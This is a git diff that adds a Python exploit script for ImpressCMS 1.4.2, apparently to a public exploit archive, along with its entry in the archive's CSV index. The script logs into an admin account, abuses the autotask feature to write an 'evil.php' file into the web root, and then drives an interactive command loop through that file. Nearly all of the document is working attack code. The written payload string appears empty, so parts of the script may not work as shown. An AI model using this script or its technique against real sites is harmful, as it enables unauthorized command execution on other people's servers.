diff --git a/exploits/php/webapps/50298.py b/exploits/php/webapps/50298.py new file mode 100755 index 000000000..643883577 --- /dev/null +++ b/exploits/php/webapps/50298.py @@ -0,0 +1,183 @@ +# Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated) +# Date: 15-09-2021 +# Exploit Author: Halit AKAYDIN (hLtAkydn) +# Vendor Homepage: https://www.impresscms.org/ +# Software Link: https://www.impresscms.org/modules/downloads/ +# Version: 1.4.2 +# Category: Webapps +# Tested on: Linux/Windows + +# ImpressCMS is a multilingual content management system for the web +# Contains an endpoint that allows remote access +# Autotask page misconfigured, causing security vulnerability + + + +# Example: python3 exploit.py -u http://example.com -l admin -p Admin123 + +import requests +import argparse +import sys +from time import sleep + +session = requests.session() + +def main(): + parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)') + parser.add_argument('-u', '--host', type=str, required=True) + parser.add_argument('-l', '--login', type=str, required=True) + parser.add_argument('-p', '--password', type=str, required=True) + args = parser.parse_args() + print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)", + "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") + exploit(args) + +def countdown(time_sec): + while time_sec: + mins, secs = divmod(time_sec, 60) + timeformat = '{:02d}'.format(secs) + print("["+timeformat+"] The task is expected to run!", end='\r') + sleep(1) + time_sec -= 1 + +def exploit(args): + #Check http or https + if args.host.startswith(('http://', 'https://')): + print("[?] Check Url...\n") + args.host = args.host + if args.host.endswith('/'): + args.host = args.host[:-1] + sleep(2) + else: + print("\n[?] Check Adress...\n") + args.host = "http://" + args.host + args.host = args.host + if args.host.endswith('/'): + args.host = args.host[:-1] + sleep(2) + + try: + response = requests.get(args.host) + if response.status_code != 200: + print("[-] Address not reachable!") + sleep(2) + exit(1) + except requests.ConnectionError as exception: + print("[-] Address not reachable") + exit(1) + + + response = requests.get(args.host + "/evil.php") + if response.status_code == 200: + print("[*] Exploit file exists!\n") + sleep(2) + print("[+] Exploit Done!\n") + + while True: + cmd = input("$ ") + url = args.host + "/evil.php?cmd=" + cmd + headers = { + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" + } + + response = requests.post(url, headers=headers, timeout=5) + + if response.text == "": + print(cmd + ": command not found\n") + else: + print(response.text) + + else: + #Login and set cookie + url = args.host + "/user.php" + cookies = { + "ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5" + } + + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "Origin": args.host, + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": args.host, + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + + data = { + "uname": args.login, + "pass": args.password, + "xoops_redirect": "/", + "op": "login" + } + + response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) + new_cookies = session.cookies.get("ICMSSESSION") + + if (new_cookies is None): + print("[-] Login Failed...\n") + print("Your username or password is incorrect.") + sleep(2) + exit(1) + else: + print("[+] Success Login...\n") + sleep(2) + + # Create Tasks + url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod" + cookies = { + "ICMSSESSION": new_cookies + } + + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "Origin": args.host, + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + + data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n" + response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) + + if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks": + print("[*] Task Create.\n") + sleep(2) + + countdown(60) + + print("\n\n[+] Exploit Done!\n") + sleep(2) + + while True: + cmd = input("$ ") + url = args.host + "/evil.php?cmd=" + cmd + headers = { + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" + } + + response = requests.post(url, headers=headers, timeout=5) + if response.text == "": + print(cmd + ": command not found\n") + else: + print(response.text) + elif response.headers.get("location") == args.host + "/user.php": + print("[!] Unauthorized user!\n\n") + print("Requires user with create task permissions.") + sleep(2) + else: + pass + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1ebcf6977..14c41ae78 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44412,6 +44412,7 @@ id,file,description,date,author,type,platform,port 50287,exploits/php/webapps/50287.py,"Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php, 50288,exploits/php/webapps/50288.py,"Apartment Visitor Management System (AVMS) 1.0 - SQLi to RCE",1970-01-01,mari0x00,webapps,php, 50292,exploits/php/webapps/50292.py,"Purchase Order Management System 1.0 - Remote File Upload",1970-01-01,"Aryan Chehreghani",webapps,php, +50298,exploits/php/webapps/50298.py,"ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50294,exploits/php/webapps/50294.txt,"Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"John Jefferson Li",webapps,php, 50295,exploits/hardware/webapps/50295.txt,"Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",webapps,hardware, 50296,exploits/php/webapps/50296.py,"Evolution CMS 3.1.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,